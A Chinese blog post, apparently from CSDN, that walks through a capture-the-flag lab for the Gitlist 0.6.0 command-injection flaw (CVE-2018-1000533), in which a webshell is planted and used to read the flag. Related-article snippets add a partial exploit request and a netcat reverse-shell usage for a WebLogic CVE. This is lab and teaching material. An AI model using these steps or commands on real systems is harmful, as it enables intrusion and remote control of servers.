【春秋云镜】CVE-2018-1000533

最新推荐文章于 2025-05-27 16:10:55 发布
最新推荐文章于 2025-05-27 16:10:55 发布
阅读量2.3k 收藏 1
点赞数 1
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_78321656/article/details/131745539
版权
文章详细描述了Gitlist在0.6.0版本中的一个命令参数注入漏洞,该漏洞可能导致远程命令执行。在春秋云镜的漏洞靶标环境下,通过使用burpsuite抓包和修改数据包,可以写入一句话木马并利用蚁剑来执行命令,例如获取flag。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

漏洞简介:

gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞

漏洞环境:

春秋云镜中的漏洞靶标,CVE编号为CVE-2018-1000533

漏洞复现:

访问漏洞环境,寻找可利用的点

 

根据cve并用burpsuite抓取数据包,并放到重放器中

 

 

 

修改数据包,写入一句话木马到网站目录中

 

可以用蚁剑连接一句话木马执行其他操作,这里要获取flag,所以直接执行命令获取flag

 

Admin331
关注
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
Ambition_sec的博客
11-17 1738
春秋CVE-2022-30887 Pharmacy Management System shell upload漏洞复现
春秋CVE-2024-0195【记录】
zhiquovo的博客
03-07 1381
春秋CVE-2024-0195【记录】 漏洞描述 SpiderFlow爬虫平台项目中spider-flow-web\src\main\java\org\spiderflow\controller\FunctionController.java文件的FunctionService.saveFunction函数调用了saveFunction函数,该调用了自定义函数validScript,该函数中用户能够控制 functionName、parameters 或 script 中的内容,从而构造恶意输入来执行
vulhub漏洞复现-Gitlist 0.6.0(cve-2018-1000533)远程命令执行漏洞
遇事不决冲冲冲
10-20 5553
Gitlist gitlist是一款使用PHP开发的图形化git仓库查看工具。 思路 在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令: public function searchTree($query, $branch) { if (empty($query)) { return null; } $query = escapeshellarg($query); try { $results = $this-&
[春秋]CVE-2018-1000533
niubi707的博客
12-01 5783
gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞
春秋 CVE-2018-1000533
qq_22002773的博客
09-06 325
春秋 CVE-2018-1000533
gitlist 0.6.0 远程命令执行漏洞(CVE-2018-1000533
EC_Carrot的博客
06-07 1256
漏洞原理 漏洞原理详细请看:https://github.com/vulhub/vulhub/tree/master/gitlist/CVE-2018-1000533 漏洞复现 发送以下数据包,即可执行命令: POST /example/tree/a/search HTTP/1.1 Host: your-ip:8080 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64
CVE-2018-2893:可以直接反弹shell
04-28
CVE-2018-2893 可以直接反弹shell Usage 监听 nc -lvvp reverse_port 发送payload python weblogic.py target_host target_port reverse_host reverse_port Reffer 说明 仅用于测试和交流学习,勿作他用
春秋境】CVE-2018-7448
comingsoooooon的博客
04-04 533
春秋境靶场解题方法,CVE-2018-7448
春秋CVE-2022-4230 夺旗
05-02
### 春秋CVE-2022-4230 夺旗知识点解析 #### 一、漏洞概述 **CVE-2022-4230** 是一个存在于 **WP Statistics** WordPress 插件(版本13.2.9及以前)中的安全漏洞。该漏洞的主要原因是插件在处理特定参数时...
春秋CVE-2018-18086
01-23
### 关于春秋 CVE-2018-18086 漏洞详情 对于CVE-2018-18086漏洞,此安全问题存在于Python的PyPI仓库中,在处理特定类型的HTTP请求时存在缺陷。具体来说,当服务器接收到带有特制User-Agent头的HTTP请求时,可能...
春秋CVE-2022-22733 Apache ShardingSphere ElasticJob UI 敏感信息泄漏漏洞 解题思路
Dark-Specter的博客
03-25 2704
网络安全中的信息泄露通常是指敏感数据无意或有意地被透露给未经授权的人员或系统。这种泄露可以通过多种方式发生,主要涉及技术漏洞、操作失误、内部威胁或安全策略的不足。
vulhub漏洞复现二十_GitList
weixin_44193247的博客
01-30 1090
vulhub漏洞复现练习篇
谈escapeshellarg绕过与参数注入漏洞
dzqxwzoe的博客
02-12 299
参数注入漏洞是指,在执行命令的时候,用户控制了命令中的某个参数,并通过一些危险的参数功能,达成攻击的目的。我们从gitlist说起,gitlist是一款使用PHP开发的图形化git仓库查看工具。在其0.6.0版本中,存在一处命令参数注入问题,可以导致远程命令执行漏洞。在用户对仓库中代码进行搜索的时候,gitlist将调用git grep命令:php​其中,$query是搜索的关键字,$branch是搜索的分支。如果用户输入的$query的值是,将可以执行id命令:)](
cve-2018-3191简析
一个安全研究员
05-27 1913
如题
CVE-2018-9995漏洞复现
qq_39627497的博客
12-06 3186
DVR,全称为Digital Video Recorder(硬盘录像机),即数字视频录像机,相对于传统的模拟摄像录像机,采用硬盘录像,故常常被称为硬盘录像机,也被称为DVR。它是一套进行图像计算存储处理的计算机系统,具有对图像/语音和动态帧等进行长时间录像、录音、远程监视和控制的功能,DVR集合了录像机、画面分割器、头控制、报警控制、网络传输等五种功能于一身,用一台设备就能取代模拟监控系统一...
“智”造巨轮启新程:数字安全的战略布局
Scgute88的博客
05-23 942
在数字化转型的浪潮中,某大型智能家电企业通过与天空卫士的合作,构建了一套全面的数据安全防护体系。该体系包括统一内容管理平台、邮件防泄露系统、网络防泄露系统和应用防泄露系统,确保数据在传输、存储和处理的每个环节都得到有效保护。这一智能化的安全解决方案不仅提升了企业的数据安全水平,还增强了员工的安全意识,为业务创新提供了坚实保障。企业的成功实践表明,数据安全是数字化转型的重要助推器,持续的安全投入和创新是企业在数字化时代稳健前行的关键。
安全生产例题
最新发布
liangjiao_shou的博客
05-27 1050
安全生产例题
2025年渗透测试面试题总结-匿名[实习]安全工程师(安全厂商)(题目+回答)
soc的博客
05-25 1137
网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。
构建安全与合规的Jenkins环境:全周期审计方案详解
TechEnthusiast的博客
05-24 890
Jenkins作为最流行的CI/CD工具之一,承载着企业核心的自动化构建与交付流程。然而,随着其复杂性的增加,安全漏洞、权限滥用和合规风险也随之而来。本文将提供一套从日志记录到应急响应的完整审计方案,帮助企业实现合规、可控的持续交付。Jenkins审计并非一次性项目,而是需要持续监控、迭代的安全实践。通过本文的方案,企业不仅能满足SOC2、ISO27001等合规要求,更能构建主动防御体系,将安全融入DevOps的每一个环节。记住:安全团队的终极目标不是阻止每一次攻击,而是让攻击者“得不偿失”。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值